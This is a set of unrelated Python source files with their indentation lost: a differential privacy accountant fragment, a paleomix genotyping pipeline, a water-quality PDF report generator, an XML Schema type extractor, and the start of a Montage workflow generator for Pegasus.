"""Privacy accountant that uses Renyi differential privacy."""
def __init__(
self,
orders: Optional[Collection[float]] = None,
neighboring_relation: NeighborRel = NeighborRel.ADD_OR_REMOVE_ONE,
):
super(RdpAccountant, self).__init__(neighboring_relation)
if orders is None:
# Default orders chosen to give good coverage for Gaussian mechanism in
# the privacy regime of interest. In the future, more orders might be
# added, in particular, fractional orders between 1.0 and 10.0 or so.
orders = [
2, 3, 4, 5, 6, 7, 8, 9, 10, 12, 14, 16, 20, 24, 28, 32, 48, 64, 128,
256, 512, 1024
]
self._orders = np.array(orders)
self._rdp = np.zeros_like(orders, dtype=np.float64)
def supports(self, event: dp_event.DpEvent) -> bool:
return self._maybe_compose(event, 0, False)
def _compose(self, event: dp_event.DpEvent, count: int = 1):
self._maybe_compose(event, count, True)
def _maybe_compose(self, event: dp_event.DpEvent, count: int,
do_compose: bool) -> bool:
"""Traverses `event` and performs composition if `do_compose` is True.
If `do_compose` is False, can be used to check whether composition is
supported.
Args:
event: A `DpEvent` to process.
count: The number of times to compose the event.
do_compose: Whether to actually perform the composition.
Returns:
True if event is supported, otherwise False.
"""
if isinstance(event, dp_event.NoOpDpEvent):
return True
elif isinstance(event, dp_event.NonPrivateDpEvent):
if do_compose:
self._rdp += np.inf
return True
elif isinstance(event, dp_event.SelfComposedDpEvent):
return self._maybe_compose(event.event, event.count * count, do_compose)
elif isinstance(event, dp_event.ComposedDpEvent):
return all(
self._maybe_compose(e, count, do_compose) for e in event.events)
elif isinstance(event, dp_event.GaussianDpEvent):
if do_compose:
self._rdp += count * _compute_rdp_poisson_subsampled_gaussian(
q=1.0, noise_multiplier=event.noise_multiplier, orders=self._orders)
return True
elif isinstance(event, dp_event.PoissonSampledDpEvent):
if self._neighboring_relation is not NeighborRel.ADD_OR_REMOVE_ONE:
return False
gaussian_noise_multiplier = _effective_gaussian_noise_multiplier(
event.event)
if gaussian_noise_multiplier is None:
return False
if do_compose:
self._rdp += count * _compute_rdp_poisson_subsampled_gaussian(
q=event.sampling_probability,
noise_multiplier=gaussian_noise_multiplier,
orders=self._orders)
return True
elif isinstance(event, dp_event.SampledWithoutReplacementDpEvent):
if self._neighboring_relation is not NeighborRel.REPLACE_ONE:
return False
gaussian_noise_multiplier = _effective_gaussian_noise_multiplier(
event.event)
if gaussian_noise_multiplier is None:
return False
if do_compose:
self._rdp += count * _compute_rdp_sample_wor_gaussian(
q=event.sample_size / event.source_dataset_size,
noise_multiplier=gaussian_noise_multiplier,
orders=self._orders)
return True
elif isinstance(event, dp_event.SingleEpochTreeAggregationDpEvent):
if self._neighboring_relation is not NeighborRel.REPLACE_SPECIAL:
return False
if do_compose:
self._rdp += count * _compute_rdp_single_epoch_tree_aggregation(
event.noise_multiplier, event.step_counts, self._orders)
return True
else:
# Unsupported event (including `UnsupportedDpEvent`).
return False
def get_epsilon(self, target_delta: float) -> float:
return _compute_epsilon(self._orders, self._rdp, target_delta)
def get_delta(self, target_epsilon: float) -> float:
return _compute_delta(self._orders, self._rdp, target_epsilon)
|
|
#!/usr/bin/python3
#
# Copyright (c) 2012 Mikkel Schubert <MikkelSch@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import os
from copy import deepcopy
from paleomix.common.fileutils import add_postfix, swap_ext
from paleomix.nodes.commands import (
BuildRegionsNode,
GenotypeRegionsNode,
PaddedBedNode,
VCFFilterNode,
)
from paleomix.nodes.samtools import BAMIndexNode, FastaIndexNode, TabixIndexNode
###############################################################################
###############################################################################
# Caches for nodes shared between multiple tasks
_BAI_CACHE = {}
_FAI_CACHE = {}
_BED_CACHE = {}
_VCF_CACHE = {}
def build_bam_index_node(bamfile):
"""Returns a node generating a BAI index (using SAMTools) for a BAM file;
the result is cached, to ensure that multiple calls for the same BAM does
not result in files being clobbered.
"""
if bamfile not in _BAI_CACHE:
_BAI_CACHE[bamfile] = BAMIndexNode(infile=bamfile)
return _BAI_CACHE[bamfile]
def build_fasta_index_node(reference):
if reference not in _FAI_CACHE:
_FAI_CACHE[reference] = FastaIndexNode(infile=reference)
return _FAI_CACHE[reference]
def build_regions_nodes(regions, padding, dependencies=()):
destination = add_postfix(regions["BED"], ".padded_%ibp" % (padding,))
if not padding:
return regions["BED"], dependencies
if destination not in _BED_CACHE:
dependencies = list(dependencies)
dependencies.append(build_fasta_index_node(regions["FASTA"]))
_BED_CACHE[destination] = PaddedBedNode(
fai_file=regions["FASTA"] + ".fai",
infile=regions["BED"],
outfile=destination,
amount=padding,
dependencies=dependencies,
)
return destination, (_BED_CACHE[destination],)
def _get_vcf_filter_options(genotyping, sample):
options = dict(genotyping["VCF_Filter"])
if options["MaxReadDepth"][sample]:
options["--max-read-depth"] = options["MaxReadDepth"][sample]
return options
def build_genotyping_bedfile_nodes(options, genotyping, sample, regions, dependencies):
bamfile = "%s.%s.bam" % (sample, regions["Prefix"])
bamfile = os.path.join(options.samples_root, bamfile)
prefix = regions["Genotypes"][sample]
padding, bedfile = genotyping["Padding"], None
if not genotyping["GenotypeEntirePrefix"]:
bedfile, nodes = build_regions_nodes(regions, padding, dependencies)
bai_node = build_bam_index_node(bamfile)
dependencies = nodes + (bai_node,)
else:
prefix = os.path.join(
os.path.dirname(prefix), "%s.%s.TEMP" % (sample, regions["Prefix"])
)
dependencies += (build_bam_index_node(bamfile),)
return prefix, bamfile, bedfile, dependencies
def build_genotyping_nodes_cached(options, genotyping, sample, regions, dependencies):
"""Carries out genotyping, filtering of calls, and indexing of files for a
given sample and prefix. If the option 'GenotypeEntirePrefix' is enabled,
the BAM is genotyped once, and each set of RegionsOfInterest simply extract
the relevant regions during construction of the consensus sequence.
Parameters:
options: An options object (c.f. paleomix.pipelines.phylo.config).
genotyping: Genotyping options defined for a specific set of areas of
interest, corresponding to Genotyping:NAME in the makefile.
sample: The name of the sample to be genotyped.
egions: A dictionary for a 'RegionsOfInterest' from the makefile.
dependencies: Depenencies that must be met before genotyping starts.
Returns a tuple containing the filename of the filtered and tabix-indexed
VCF file, and the top-level node generating this file. Multiple calls for
the same BAM and prefix will return the same VCF and nodes if the option
for 'GenotypeEntirePrefix' is enabled, otherwise each ROI is genotyped
individiually.
Output files are generated in ./results/PROJECT/genotyping. If the option
for 'GenotypeEntirePrefix' is enabled, the following files are generated:
SAMPLE.PREFIX.vcf.bgz: Unfiltered calls for variant/non-variant sites.
SAMPLE.PREFIX.filtered.vcf.bgz: Variant calls filtered with vcf_filter.
SAMPLE.PREFIX.filtered.vcf.bgz.tbi: Tabix index for the filtered VCF.
If 'GenotypeEntirePrefix' is not enabled for a given ROI, the following
files are generated for that ROI (see descriptions above):
SAMPLE.PREFIX.ROI.filtered.vcf.bgz
SAMPLE.PREFIX.ROI.filtered.vcf.bgz.tbi
SAMPLE.PREFIX.ROI.vcf.bgz
In addition, the following files are generated for each set of
RegionsOfInterest (ROI), regardless of the 'GenotypeEntirePrefix' option:
SAMPLE.PREFIX.ROI.CDS.fasta: FASTA sequence of each feature in the ROI.
SAMPLE.PREFIX.ROI.CDS.fasta.fai: FASTA index generated using SAMTools.
"""
output_prefix, bamfile, bedfile, dependencies = build_genotyping_bedfile_nodes(
options, genotyping, sample, regions, dependencies
)
if (bamfile, output_prefix) in _VCF_CACHE:
return _VCF_CACHE[(bamfile, output_prefix)]
calls = swap_ext(output_prefix, ".vcf.bgz")
filtered = swap_ext(output_prefix, ".filtered.vcf.bgz")
# 1. Call samtools mpilup | bcftools view on the bam
genotype = GenotypeRegionsNode(
reference=regions["FASTA"],
bedfile=bedfile,
infile=bamfile,
outfile=calls,
mpileup_options=genotyping["MPileup"],
bcftools_options=genotyping["BCFTools"],
dependencies=dependencies,
)
# 2. Filter all sites using the 'vcf_filter' command
vcffilter = VCFFilterNode(
infile=calls,
outfile=filtered,
regions=regions,
options=_get_vcf_filter_options(genotyping, sample),
dependencies=genotype,
)
# 3. Tabix index. This allows random-access to the VCF file when building
# the consensus FASTA sequence later in the pipeline.
tabix = TabixIndexNode(infile=filtered, preset="vcf", dependencies=[vcffilter])
_VCF_CACHE[(bamfile, output_prefix)] = (filtered, tabix)
return filtered, tabix
def build_genotyping_nodes(options, genotyping, sample, regions, dependencies):
"""Builds the nodes required for genotyping a BAM, in part or in whole.
By default, only the region of interest (including padding) will be
genotyped. However, if option 'GenotypeEntirePrefix' is enabled, the entire
genome is genotyped, and reused between different areas of interest.
In addition to the files generated by 'build_genotyping_nodes_cached', this
function generates the following files:
SAMPLE.PREFIX.ROI.fasta: FASTA containing each named region.
SAMPLE.PREFIX.ROI.fasta.fai: Index file built using "samtools faidx"
The function returns a sequence of the top-level nodes generating the files.
"""
# 1. Get path of the filtered VCF file, and the assosiated node
filtered, node = build_genotyping_nodes_cached(
options=options,
genotyping=genotyping,
sample=sample,
regions=regions,
dependencies=dependencies,
)
# 2. Generate consensus sequence from filtered VCF
output_fasta = regions["Genotypes"][sample]
builder_options = {}
if regions["ProteinCoding"]:
builder_options["--whole-codon-indels-only"] = None
if not regions["IncludeIndels"]:
builder_options["--ignore-indels"] = None
builder = BuildRegionsNode(
infile=filtered,
bedfile=regions["BED"],
outfile=output_fasta,
padding=genotyping["Padding"],
options=builder_options,
dependencies=node,
)
# 3. Index sequences to make retrival easier for MSA
faidx = FastaIndexNode(infile=output_fasta, dependencies=[builder])
return (faidx,)
def build_sample_nodes(options, genotyping, regions_sets, sample, dependencies=()):
nodes = []
for regions in regions_sets.values():
regions = deepcopy(regions)
# Enforce homozygous contigs based on sex tag
regions["HomozygousContigs"] = regions["HomozygousContigs"][sample["Sex"]]
nodes.extend(
build_genotyping_nodes(
options=options,
genotyping=genotyping[regions["Name"]],
sample=sample["Name"],
regions=regions,
dependencies=dependencies,
)
)
return nodes
def chain(options, makefiles):
destination = options.destination
for makefile in makefiles:
regions_sets = makefile["Project"]["Regions"]
genotyping = makefile["Genotyping"]
options.destination = os.path.join(destination, makefile["Project"]["Title"])
nodes = []
for sample in makefile["Project"]["Samples"].values():
nodes.extend(
build_sample_nodes(
options, genotyping, regions_sets, sample, makefile["Nodes"]
)
)
makefile["Nodes"] = tuple(nodes)
options.destination = destination
|
|
import sys
import os
import io
from jinja2 import Environment, FileSystemLoader, FunctionLoader
import urllib
import base64
import copy
import gc
import numpy as np
import pandas as pd
import matplotlib as mpl
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import seaborn as sns
import scipy.stats as stats
# pip install https://github.com/Geosyntec/python-pdfkit/archive/master.zip
import pdfkit
from ..utils import (html_template, css_template)
import wqio
sns.set(style='ticks', context='paper')
mpl.rcParams['text.usetex'] = False
mpl.rcParams['lines.markeredgewidth'] = .5
mpl.rcParams['font.family'] = ['sans-serif']
mpl.rcParams['mathtext.default'] = 'regular'
def make_table(loc):
# make table
singlevarfmtr = '{0:.3f}'
doublevarfmtr = '{0:.3f}; {1:.3f}'
multilinefmtr = '{0:.3f}\n({1:.3f}; {2:.3f})'
if loc.logmean is None:
logmean = np.nan
else:
logmean = loc.logmean
if loc.geomean is None:
geomean = np.nan
else:
geomean = loc.geomean
if loc.logstd is None:
logstd = np.nan
else:
logstd = loc.logstd
if loc.logmean_conf_interval is None:
logmean_conf_interval = [np.nan, np.nan]
else:
logmean_conf_interval = loc.logmean_conf_interval
if loc.geomean_conf_interval is None:
geomean_conf_interval = [np.nan, np.nan]
else:
geomean_conf_interval = loc.geomean_conf_interval
rows = [
['Count', singlevarfmtr.format(loc.N)],
['Number of NDs', singlevarfmtr.format(loc.ND)],
['Min; Max ({})'.format(loc.definition['unit']),
doublevarfmtr.format(loc.min,loc.max)],
['Mean ({})\n(95% confidence interval)'.format(loc.definition['unit']),
multilinefmtr.format(
loc.mean, *loc.mean_conf_interval)],
['Standard Deviation ({})'.format(loc.definition['unit']),
singlevarfmtr.format(loc.std)],
['Log. Mean\n(95% confidence interval)', multilinefmtr.format(
logmean, *logmean_conf_interval).replace('nan', '-')],
['Log. Standard Deviation', singlevarfmtr.format(logstd).replace('nan', '-')],
['Geo. Mean ({})\n(95% confidence interval)'.format(loc.definition['unit']),
multilinefmtr.format(
geomean, *geomean_conf_interval).replace('nan', '-')],
['Coeff. of Variation', singlevarfmtr.format(loc.cov)],
['Skewness', singlevarfmtr.format(loc.skew)],
['Median ({})\n(95% confidence interval)'.format(loc.definition['unit']),
multilinefmtr.format(
loc.median, *loc.median_conf_interval)],
['Quartiles ({})'.format(loc.definition['unit']),
doublevarfmtr.format(loc.pctl25, loc.pctl75)],
]
return pd.DataFrame(rows, columns=['Statistic', 'Result'])
def make_report(loc, savename, analyte=None, geolocation=None, statplot_options={}):
""" Produces a statistical report for the specified analyte.
Parameters
----------
loc : wqio.Location
The Location object to be summarized.
savename : str
Filename/path of the output pdf
analyte : str, optional
Optional name for the analyte in the ``loc``'s data.
statplot_options : dict, optional
Dictionary of keyward arguments to be passed to
wqio.Location.statplot
Returns
-------
None
See also
--------
wqio.Location
wqio.Location.statplot
"""
if loc.full_data.shape[0] >= 3:
if analyte is None:
analyte = loc.definition.get("analyte", "unknown")
if geolocation is None:
geolocation = loc.definition.get("geolocation", "unknown")
unit = loc.definition['unit']
thershold = loc.definition['thershold']
if 'ylabel' not in statplot_options:
statplot_options['ylabel'] = analyte + ' ' + '(' + unit + ')'
if 'xlabel' not in statplot_options:
statplot_options['xlabel'] = 'Monitoring Location' #used to be geolocation
# make the table
table = make_table(loc)
table_html = table.to_html(index=False, justify='left').replace('\\n', '\n')
# wqio figure - !can move args to main func later!
fig = loc.statplot(**statplot_options)
ax1, ax2 = fig.get_axes()
ax1xlim = ax1.get_xlim()
ax2xlim = ax2.get_xlim()
if loc.dataframe[loc.dataframe[loc.cencol]].shape[0] > 0:
# print(loc.dataframe.head())
qntls, ranked = stats.probplot(loc.data, fit=False)
xvalues = stats.norm.cdf(qntls) * 100
figdata = loc.dataframe.sort(columns='modeled')
figdata['xvalues'] = xvalues
figdata = figdata[figdata[loc.cencol]]
ax2.plot(figdata.xvalues, figdata['modeled'], linestyle='', marker='s',
color='tomato', label='Extrapolated values')
ax2.plot(ax2xlim, [thershold]*2, color=sns.color_palette()[-1], label='Threshold')
handles, labels = ax2.get_legend_handles_labels()
labels[0] = 'Data'
ax2.legend(handles, labels, loc='best')
ax2.set_xlabel('Percent less than value')
ax1.set_xlim(ax1xlim)
ax2.set_xlim(ax2xlim)
ax2ylim = ax2.get_ylim()
ax1.set_ylim(ax2ylim)
fig.tight_layout()
# force figure to a byte object in memory then encode
boxplot_img = io.BytesIO()
fig.savefig(boxplot_img, format="png", dpi=300)
boxplot_img.seek(0)
boxplot_uri = ('data:image/png;base64,'
+ urllib.parse.quote(base64.b64encode(boxplot_img.read())))
# box plot legend
figl, axl = plt.subplots(1,1, figsize=(7,10))
img = mpimg.imread('box.png')
axl.imshow(img)
axl.xaxis.set_visible(False)
axl.yaxis.set_visible(False)
sns.despine(ax=axl, top=True, right=True, left=True, bottom=True)
legend_img = io.BytesIO()
figl.savefig(legend_img, format="png", dpi=300, bbox_inches='tight')
legend_img.seek(0)
legend_uri = ('data:image/png;base64,'
+ urllib.parse.quote(base64.b64encode(legend_img.read())))
# html magic
env = Environment(loader=FileSystemLoader(r'.\utils'))
template = env.from_string(html_template.getvalue())
# create pdf report
template_vars = {'analyte' : analyte,
'location': geolocation,
'analyte_table': table_html,
'legend': legend_uri,
'boxplot': boxplot_uri}
html_out = template.render(template_vars)
csst = copy.copy(css_template)
try:
print('Creating report {}'.format(savename))
pdf = pdfkit.from_string(html_out, savename, css=csst)
except OSError as e:
raise OSError('The tool cannot write to the destination path. '
'Please check that the destination pdf is not open.\n'
'Trace back:\n{}'.format(e))
plt.close(fig)
del boxplot_img
del figl
else:
print('{} does not have greater than 3 data points, skipping...'.format(savename))
print('\n')
gc.collect()
class PdfReport(object):
""" Class to generate generic 1-page reports from wqio objects.
Parameters
----------
path : str
Filepath to the CSV file containing input data.
analytecol : str (default = 'analyte')
Column in the input file that contains the analyte name.
rescol : str (default='res')
Column in the input file that contains the result values.
qualcol : str (default='qual')
Column in the input file that contains the data qualifiers
labeling data as right-censored (non-detect) or not.
ndvals : list of strings
List of values found in ``qualcol`` that flag data as being
right-censored (non-detect). Any value in ``qualcol`` that is
*not* in this list will be assumed to denote an uncensored
(detected value).
bsIter : int (default = 10000)
Number of iterations used to refined statistics via a bias-
corrected and accelerated (BCA) bootstrapping method.
useROS : bool (default is True)
Toggles the use of regression-on-order statistics to estimate
censored (non-detect) values when computing summary statistics.
Examples
--------
>>> import wqreports
>>> report = wqreports.PdfReport("~/data/arsenic.csv", ndvals=['U', 'UJ', '<'])
>>> report.make_report(...)
"""
def __init__(self, path, analytecol='analyte', rescol='res',
qualcol='qual', unitcol='unit', locationcol='location',
thersholdcol='threshold', ndvals=['U'], bsIter=5000,
useROS=False):
self.filepath = path
self.ndvals = ndvals
self.final_ndval = 'ND'
self.bsIter = bsIter
self.useROS = useROS
self.analytecol = analytecol
self.unitcol = unitcol
self.locationcol = locationcol
self.thersholdcol = thersholdcol
self.rescol = rescol
self.qualcol = qualcol
self._rawdata = None
self._cleandata = None
self._analytes = None
self._geolocations = None
self._thresholds = None
self._locations = None
@property
def rawdata(self):
""" Raw data as parsed by pandas.read_csv(self.filepath)
"""
if self._rawdata is None:
self._rawdata = pd.read_csv(
self.filepath,
dtype={
self.analytecol: str,
self.unitcol: str,
self.locationcol: str,
self.thersholdcol: np.float64,
self.rescol: np.float64,
self.qualcol: str,
})
return self._rawdata
@property
def cleandata(self):
""" Cleaned data with simpler qualifiers.
"""
if self._cleandata is None:
self._cleandata = (
self.rawdata
.replace({self.qualcol:{_: self.final_ndval for _ in self.ndvals}})
)
return self._cleandata
@property
def analytes(self):
""" Simple list of the analytes to be analyzed.
"""
if self._analytes is None:
self._analytes = self.cleandata[self.analytecol].unique().tolist()
self._analytes.sort()
return self._analytes
@property
def geolocations(self):
"""Simple list of the physical locations in the dataset.
"""
if self._geolocations is None:
self._geolocations = self.cleandata[self.locationcol].unique().tolist()
self._geolocations.sort()
return self._geolocations
@property
def thresholds(self):
"""Simple dictionary of thresholds per each analyte.
"""
if self._thresholds is None:
thresholds = (self.cleandata.loc[:,[self.analytecol, self.thersholdcol]]
.drop_duplicates())
tshape = thresholds.shape[0]
thresholds = thresholds.set_index(self.analytecol).loc[:,self.thersholdcol]
thresholds = thresholds.to_dict()
if tshape != len(thresholds):
e = ('An analyte has mroe than one thershold value, please'
' check the input data')
raise ValueError(e)
self._thresholds = thresholds
return self._thresholds
@property
def locations(self):
""" Simple list of wqio.Location objects for each analyte.
"""
if self._locations is None:
self._locations = {}
gb = self.cleandata.groupby([self.locationcol, self.analytecol])
for gl, a in gb.groups.keys():
loc = self._make_location(gl, a)
loc.definition.update({"analyte": a, "geolocation": gl})
self._locations[(gl, a)] = loc
return self._locations
def _make_location(self, location, analyte):
""" Make a wqio.Location from an analyte.
Parameters
----------
analyte : string
The pollutant to be included in the Location.
Returns
-------
loc : wqio.Location
A wqio.Location object for the provided analyte.
"""
if analyte not in self.analytes:
raise ValueError("{} is not in the dataset".format(analyte))
if location not in self.geolocations:
raise ValueError("{} is not in the dataset".format(location))
# get target analyte
querystring = "{} == @location and {} == @analyte".format(self.locationcol, self.analytecol)
data = self.cleandata.query(querystring)
if data[self.unitcol].unique().shape[0] > 1:
e = 'More than one unit detected for {}-{}. Please check the input file'
raise ValueError(e)
loc = wqio.features.Location(data, bsIter=self.bsIter, ndval=self.final_ndval,
rescol=self.rescol, qualcol=self.qualcol,
useROS=self.useROS, include=True)
loc.definition = {
'unit': data[self.unitcol].iloc[0],
'thershold': self.thresholds[analyte]
}
return loc
def export_pdfs(self, output_path, basename=None, **statplot_options):
""" Export 1-pg summary PDF for each analyte in the data.
Parameters
----------
output_path : string
Folder path in which all PDFs will be saved
basename : string, optional
Prefix for the filename of each PDF. If omitted, the
filename will simply the be analyte.
statplot_options : optional keyword arguments
Options passed directly to wqio.Location.statplot
"""
if basename is None:
basename = ""
for (geolocation, analyte), loc in self.locations.items():
san_geolocation = wqio.utils.processFilename(geolocation)
san_analyte = wqio.utils.processFilename(analyte)
filename = os.path.join(output_path, '{}{}{}.pdf'.format(
basename, san_geolocation, san_analyte))
# need to make a copy so that the dict does not get changed in
# the low functions
spo = copy.copy(statplot_options)
make_report(loc, filename, analyte=analyte, geolocation=geolocation,
statplot_options=spo)
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Imports
from collections import OrderedDict
import os
import StringIO
from lxml import etree
import process_includes
#
# Globals and constants
SchemaNS = 'http://www.w3.org/2001/XMLSchema'
Nsmap = OrderedDict({
'xs': SchemaNS,
})
#
# Functions for external use
#
# Classes
class TypeDescriptor(object):
def __init__(self, name, type_name=None):
self.name_ = name
self.type_name_ = type_name
self.type_obj_ = None
def __str__(self):
return '<%s -- name: %s type: %s>' % (self.__class__.__name__,
self.name, self.type_name,)
def get_name_(self):
return self.name_
def set_name_(self, name):
self.name_ = name
name = property(get_name_, set_name_)
def get_type_name_(self):
return self.type_name_
def set_type_name_(self, type_name):
self.type_name_ = type_name
type_name = property(get_type_name_, set_type_name_)
def get_type_obj_(self):
return self.type_obj_
def set_type_obj_(self, type_obj):
self.type_obj_ = type_obj
type_obj = property(get_type_obj_, set_type_obj_)
class ComplexTypeDescriptor(TypeDescriptor):
def __init__(self, name):
super(ComplexTypeDescriptor, self).__init__(name)
self.elements_ = []
self.attributes_ = OrderedDict()
def get_elements_(self):
return self.elements_
def set_elements_(self, elements):
self.elements_ = elements
elements = property(get_elements_, set_elements_)
def get_attributes_(self):
return self.attributes_
def set_attributes_(self, attributes):
self.attributes_ = attributes
attributes = property(get_attributes_, set_attributes_)
class SimpleTypeDescriptor(TypeDescriptor):
def __init__(self, name, type_name):
super(SimpleTypeDescriptor, self).__init__(name, type_name)
#
# Table of builtin types
Simple_type_names = [
'string',
'normalizedString',
'token',
'base64Binary',
'hexBinary',
'integer',
'positiveInteger',
'negativeInteger',
'nonNegativeInteger',
'nonPositiveInteger',
'long',
'unsignedLong',
'int',
'unsignedInt',
'short',
'unsignedShort',
'byte',
'unsignedByte',
'decimal',
'float',
'double',
'boolean',
'duration',
'dateTime',
'date',
'time',
'gYear',
'gYearMonth',
'gMonth',
'gMonthDay',
'gDay',
'Name',
'QName',
'NCName',
'anyURI',
'language',
'ID',
'IDREF',
'IDREFS',
'ENTITY',
'ENTITIES',
'NOTATION',
'NMTOKEN',
'NMTOKENS',
]
Builtin_descriptors = OrderedDict()
for name in Simple_type_names:
Builtin_descriptors[name] = SimpleTypeDescriptor(name, name)
#
# Functions for internal use and testing
def extract_descriptors(infile_name):
schema_file_name = os.path.join(
os.path.abspath(os.path.curdir),
infile_name)
infile = StringIO.StringIO()
process_includes.process_include_files(infile_name, infile,
inpath=schema_file_name)
infile.seek(0)
doc = etree.parse(infile)
root = doc.getroot()
return extract(root)
def get_descriptor_name(d):
return d.name
def extract(root):
unresolved = OrderedDict()
# Process top level simpleTypes. Resolve the base types.
nodes = root.xpath('xs:simpleType', namespaces=Nsmap)
for node in nodes:
name, type_name = get_simple_name_type(node)
descriptor = SimpleTypeDescriptor(name, type_name)
unresolved[name] = descriptor
resolved = resolve_simple_types(unresolved)
return export_defined_simple_types(resolved)
## for descriptor in resolved.itervalues():
## print '%s type name: %s' % (descriptor, descriptor.type_obj.name, )
def export_defined_simple_types(resolved):
simple_type_table = OrderedDict()
for descriptor in resolved.itervalues():
name = descriptor.name
prefix, type_name = get_prefix_name(descriptor.type_name)
simple_type_table[name] = SimpleTypeDescriptor(name, type_name)
return simple_type_table
def resolve_simple_types(unresolved):
resolved = OrderedDict()
#import pdb; pdb.set_trace()
sorted_descriptors = unresolved.values()
sorted_descriptors.sort(key=get_descriptor_name)
for descriptor in sorted_descriptors:
resolve_1_simple_type(descriptor, resolved, unresolved)
return resolved
def resolve_1_simple_type(descriptor, resolved, unresolved):
prefix, name = get_prefix_name(descriptor.type_name)
if name in Builtin_descriptors:
type_obj = Builtin_descriptors[name]
descriptor.type_obj = type_obj
resolved[descriptor.name] = descriptor
return type_obj
elif name in resolved:
type_obj = resolved[name].type_obj
descriptor.type_obj = type_obj
resolved[descriptor.name] = descriptor
return type_obj
else:
#import pdb; pdb.set_trace()
type_obj = resolve_1_simple_type(unresolved[name],
resolved, unresolved)
descriptor.type_obj = type_obj
resolved[descriptor.name] = descriptor
return type_obj
def get_simple_name_type(node):
type_name = None
name = node.get('name')
# Is it a restriction?
if name is not None:
nodes = node.xpath('.//xs:restriction', namespaces=Nsmap)
if nodes:
restriction = nodes[0]
type_name = restriction.get('base')
# Not a restriction. Try list.
if type_name is None:
nodes = node.xpath('.//xs:list', namespaces=Nsmap)
if nodes:
type_name = 'string'
# Not a list. Try union.
if type_name is None:
nodes = node.xpath('.//xs:union', namespaces=Nsmap)
if nodes:
union = nodes[0]
member_types = union.get('memberTypes')
if member_types:
member_types = member_types.split()
if member_types:
type_name = member_types[0]
return name, type_name
def get_prefix_name(tag):
prefix = ''
name = ''
items = tag.split(':')
if len(items) == 2:
prefix = items[0]
name = items[1]
elif len(items) == 1:
name = items[0]
return prefix, name
def etxpath(node, pat):
nodes = node.xpath(pat, namespaces=Nsmap)
return nodes
|
|
#!/usr/bin/env python
"""
Pegasus DAX generator for the Montage toolkit. The generated
workflow will support multiple bands and colors to produce
a color image.
# Copyright 2016 University Of Southern California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
import os
import argparse
import re
import subprocess
import sys
#Insert this directory in our search path
os.sys.path.insert(0, os.getcwd())
from astropy.io import ascii
from AutoADAG import *
from Pegasus.DAX3 import *
common_files = {}
replica_catalog = {}
def which(file):
for path in os.environ["PATH"].split(os.pathsep):
if os.path.exists(os.path.join(path, file)):
return os.path.join(path, file)
return None
def build_transformation_catalog(tc_target, dax):
"""
Some transformations in Montage uses multiple executables
"""
exes = {}
full_path = which("mProject")
if full_path is None:
raise RuntimeError("mProject is not in the $PATH")
base_dir = os.path.dirname(full_path)
f = open("data/tc.txt", "w")
if tc_target == "container":
f.write("cont montage {\n")
f.write(" type \"singularity\"\n")
f.write(" image \"library://ryantanaka/default/montage-workflow:6.0\"\n")
f.write(" profile env \"MONTAGE_HOME\" \"/opt/Montage\"\n")
f.write("}\n")
for fname in os.listdir(base_dir):
if fname == ".":
continue
#if fname == "mDiffFit":
# special compound transformation - see below
# continue
f.write("\n")
f.write("tr %s {\n" %(fname))
if tc_target == "regular":
f.write(" site local {\n")
f.write(" type \"STAGEABLE\"\n")
f.write(" arch \"x86_64\"\n")
f.write(" pfn \"file://%s/%s\"\n" %(base_dir, fname))
else:
# container
f.write(" site condor_pool {\n")
f.write(" type \"INSTALLED\"\n")
f.write(" container \"montage\"\n")
f.write(" pfn \"file://%s/%s\"\n" %(base_dir, fname))
# resource requirements
f.write(" profile condor \"request_memory\" \"ifthenelse(isundefined(DAGNodeRetry) || DAGNodeRetry == 0, 1024, 4096)\"\n")
f.write(" profile condor \"request_disk\" \"5G\"\n")
if fname in ["mProject", "mDiff", "mDiffFit", "mBackground"]:
f.write(" profile pegasus \"clusters.size\" \"3\"\n")
f.write(" }\n")
f.write("}\n")
f.close()
# some Montage tools depend on other tools
for tname in ["mDiffFit"]:
t = Transformation(tname)
if tname == "mDiffFit":
t.uses(Executable("mDiff"))
t.uses(Executable("mFitplane"))
t.uses(Executable("mDiffFit"))
dax.addTransformation(t)
def generate_region_hdr(dax, center, degrees):
global common_files
(crval1, crval2) = center.split()
crval1 = float(crval1)
crval2 = float(crval2)
cdelt = 0.000277778
naxis = int((float(degrees) / cdelt) + 0.5)
crpix = (naxis + 1) / 2.0
f = open("data/region.hdr", "w")
f.write("SIMPLE = T\n")
f.write("BITPIX = -64\n")
f.write("NAXIS = 2\n")
f.write("NAXIS1 = %d\n" %(naxis))
f.write("NAXIS2 = %d\n" %(naxis))
f.write("CTYPE1 = 'RA---TAN'\n")
f.write("CTYPE2 = 'DEC--TAN'\n")
f.write("CRVAL1 = %.6f\n" %(crval1))
f.write("CRVAL2 = %.6f\n" %(crval2))
f.write("CRPIX1 = %.6f\n" %(crpix))
f.write("CRPIX2 = %.6f\n" %(crpix))
f.write("CDELT1 = %.9f\n" %(-cdelt))
f.write("CDELT2 = %.9f\n" %(cdelt))
f.write("CROTA2 = %.6f\n" %(0.0))
f.write("EQUINOX = %d\n" %(2000))
f.write("END\n")
f.close()
common_files["region.hdr"] = File("region.hdr")
